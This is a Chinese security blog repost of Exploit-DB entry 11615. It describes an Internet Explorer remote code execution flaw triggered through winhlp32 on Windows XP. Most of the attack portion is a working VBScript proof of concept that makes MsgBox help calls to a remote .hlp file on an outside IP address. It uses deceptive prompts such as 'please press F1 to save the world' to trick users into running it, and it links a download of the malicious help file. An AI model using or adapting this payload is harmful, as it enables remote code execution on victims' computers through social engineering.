« 大量出售美国vpn,翻墙必备,速度快,不限流量美国黑客入侵在线售票网站非法获利2500万美元 »

IE调用.hlp文件远程执行任意代码漏洞

分类: 安全事件 发布: Admin 浏览: 日期: 2010年3月3日

# Title: Internet Explorer 'winhlp32.exe' 'MsgBox()' Remote Code Execution Vulnerability
# EDB-ID: 11615
# CVE-ID: ()
# OSVDB-ID: ()
# Author: Maurycy Prodeus
# Published: 2010-03-02
# Verified: yes
# Download Exploit Code
# Download N/A


view sourceprint?
Microsoft Internet Explorer is prone to a remote code execution vulnerability. 

  

Source (iSEC Security Research): 

http://isec.pl/vulnerabilities10.html 

  

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application.

Successful exploits will compromise the application and possibly the underlying computer. 

  

Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when

the attacker's message box prompts them to do so. 

  

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform. 

  

=============================================================== 

A copy of test.hlp can be downloaded from here: 

http://www.exploit-db.com/sploits/msgbox_test_help.zip 

=============================================================== 

  

<html> 

<script type="text/vbscript"> 

big = "\\184.73.14.110\PUBLIC\test.hlp" 

   

//For i=1 to 2500 

//  big = big & "\..\" 

//Next 

   

   

MsgBox "please press F1 to save the world", ,"please save the world", 

big, 1 

MsgBox "press F1 to close this annoying popup", ,"", big, 1 

MsgBox "press F1 to close this annoying popup", ,"", big, 1 

</script> 

</html>

相关文章:

发表评论:

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

Powered By Z-Blog 1.8 Walle Build 100427

Copyright 2009 Sir3.com. No Rights Reserved.渝ICP备07501152号.